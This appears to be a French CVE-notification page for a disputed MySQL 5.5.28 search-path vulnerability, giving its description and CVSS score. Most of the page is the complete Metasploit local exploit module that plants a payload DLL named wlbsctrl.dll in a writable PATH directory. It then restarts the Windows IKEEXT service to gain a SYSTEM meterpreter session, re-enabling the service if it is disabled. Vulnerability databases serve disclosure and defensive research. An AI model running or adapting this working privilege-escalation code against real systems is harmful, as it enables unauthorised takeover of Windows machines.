Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Untrusted search path vulnerability in the installation functionality in Oracle MySQL 5.5.28, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the "C:\MySQL\MySQL Server 5.5\bin" directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the MySQL installation
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 6.2 | AV:L/AC:H/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 28130
Date de publication : 2013-09-05 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/windows/services'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Services
include Msf::Post::Windows::Accounts
def initialize(info={})
super( update_info( info,
'Name' => 'IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL',
'Description' => %q{
This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'
(IKEEXT) service which runs as SYSTEM, and starts automatically in default
installations of Vista-Win8.
It requires an insecure bin path to plant the DLL payload.
},
'References' =>
[
['URL', 'https://www.htbridge.com/advisory/HTB23108'],
['URL', 'https://www.htbridge.com/vulnerability/uncontrolled-search-path-element.html']
],
'DisclosureDate' => "Oct 09 2012",
'License' => MSF_LICENSE,
'Author' =>
[
'Ben Campbell <eat_meatballs@hotmail.co.uk>'
],
'Platform' => [ 'win'],
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'SessionTypes' => [ "meterpreter" ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => 5,
'ReverseConnectRetries' => 255
},
'DefaultTarget' => 0
))
register_options([
OptString.new("DIR", [ false, "Specify a directory to plant the DLL.", ""])
])
@service_name = 'IKEEXT'
@load_lib_search_path = [ '%SystemRoot%\\System32',
'%SystemRoot%\\System',
'%SystemRoot%'
]
@non_existant_dirs = []
end
def check_service_exists?(service)
srv_info = service_info(service)
if srv_info.nil?
print_warning("Unable to enumerate services.")
return false
end
if srv_info && srv_info['Name'].empty?
print_warning("Service #{service} does not exist.")
return false
else
return true
end
end
def check
srv_info = service_info(@service_name)
if !check_service_exists?(@service_name)
return Exploit::CheckCode::Safe
end
vprint_status(srv_info.to_s)
case srv_info['Startup']
when 'Disabled'
print_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...")
return Exploit::CheckCode::Safe
when 'Manual'
print_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...")
return Exploit::CheckCode::Safe
when 'Auto'
print_good("Service is set to Automatically start...")
end
if check_search_path
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Vulnerable
end
def check_search_path
dll = 'wlbsctrl.dll'
@load_lib_search_path.each do |path|
dll_path = "#{expand_path(path)}\\#{dll}"
if file_exist?(dll_path)
print_warning("DLL already exists at #{dll_path}...")
return true
end
end
return false
end
def check_system_path
print_status("Checking %PATH% folders for write access...")
result = registry_getvaldata('HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment', 'Path')
if result.nil?
print_error("Unable to retrieve %PATH% from registry.")
return
end
paths = result.split(';')
paths.append(@load_lib_search_path).flatten!.uniq!
paths.each do |p|
path = expand_path(p)
if exist?(path)
if check_write_access(path)
return path
end
else
# User may be able to create the path...
print_status("Path #{path} does not exist...")
@non_existant_dirs << path
end
end
return nil
end
def check_write_access(path)
perm = check_dir_perms(path, @token)
if perm and perm.include?('W')
print_good ("Write permissions in #{path} - #{perm}")
return true
elsif perm
vprint_status ("Permissions for #{path} - #{perm}")
else
vprint_status ("No permissions for #{path}")
end
return false
end
def check_dirs
print_status("Attempting to create a non-existant PATH dir to use.")
@non_existant_dirs.each do |dir|
begin
client.fs.dir.mkdir(dir)
if exist?(dir)
register_file_for_cleanup(dir)
return dir
end
rescue Rex::Post::Meterpreter::RequestError => e
vprint_status("Unable to create dir: #{dir} - #{e}")
end
end
return nil
end
def check_session_arch
if sysinfo['Architecture'] =~ /x64/i
if payload_instance.arch.first == 'x86'
fail_with(Exploit::Failure::BadConfig, "Wrong Payload Architecture")
end
else
if payload_instance.arch.first =~ /64/i
fail_with(Exploit::Failure::BadConfig, "Wrong Payload Architecture")
end
end
end
def exploit
check_session_arch
begin
@token = get_imperstoken
rescue Rex::Post::Meterpreter::RequestError
vprint_error("Error while using get_imperstoken: #{e}")
end
fail_with(Exploit::Failure::Unknown, "Unable to retrieve token.") unless @token
if is_system?
fail_with(Exploit::Failure::Unknown, "Current user is already SYSTEM, aborting.")
end
print_status("Checking service exists...")
if !check_service_exists?(@service_name)
fail_with(Exploit::Failure::NoTarget, "The service doesn't exist.")
end
if is_uac_enabled?
print_warning("UAC is enabled, may get false negatives on writable folders.")
end
if datastore['DIR'].empty?
# If DLL already exists in system folders, we dont want to overwrite by accident
if check_search_path
fail_with(Exploit::Failure::NotVulnerable, "DLL already exists in system folders.")
end
file_path = check_system_path
file_path ||= check_dirs # If no paths are writable check to see if we can create any of the non-existant dirs
if file_path.nil?
fail_with(Exploit::Failure::NotVulnerable, "Unable to write to any folders in the PATH, aborting...")
end
else
# Use manually selected Dir
file_path = datastore['DIR']
end
@dll_file_path = "#{file_path}\\wlbsctrl.dll"
service_information = service_info(@service_name)
if service_information['Startup'] == 'Disabled'
print_status("Service is disabled, attempting to enable...")
service_change_startup(@service_name, 'auto')
service_information = service_info(@service_name)
# Still disabled
if service_information['Startup'] == 'Disabled'
fail_with(Exploit::Failure::NotVulnerable, "Unable to enable service, aborting...")
end
end
# Check architecture
dll = generate_payload_dll
#
# Drop the malicious executable into the path
#
print_status("Writing #{dll.length.to_s} bytes to #{@dll_file_path}...")
begin
write_file(@dll_file_path, dll)
register_file_for_cleanup(@dll_file_path)
rescue Rex::Post::Meterpreter::RequestError => e
# Can't write the file, can't go on
fail_with(Exploit::Failure::Unknown, e.message)
end
#
# Run the service, let the Windows API do the rest
#
print_status("Launching service #{@service_name}...")
begin
status = service_start(@service_name)
if status == 1
print_status("Service already running, attempting to restart...")
if service_stop(@service_name) == 0
print_status("Service stopped, attempting to start...")
if service_start(@service_name) == 0
print_status("Service started...")
else
fail_with(Exploit::Failure::Unknown, "Unable to start service.")
end
else
fail_with(Exploit::Failure::Unknown, "Unable to stop service")
end
elsif status == 0
print_status("Service started...")
end
rescue RuntimeError => e
raise e if e.kind_of? Msf::Exploit::Failed
if service_information['Startup'] == 'Manual'
fail_with(Exploit::Failure::Unknown, "Unable to start service, and it does not auto start, cleaning up...")
else
if job_id
print_status("Unable to start service, handler running waiting for a reboot...")
while(true)
break if session_created?
select(nil,nil,nil,1)
end
else
fail_with(Exploit::Failure::Unknown, "Unable to start service, use exploit -j to run as a background job and wait for a reboot...")
end
end
end
end
end
Products Mentioned
Configuraton 0
Oracle>>Mysql >> Version 5.5.28
- Oracle>>Mysql >> Version 5.5.28 (Open CPE detail)
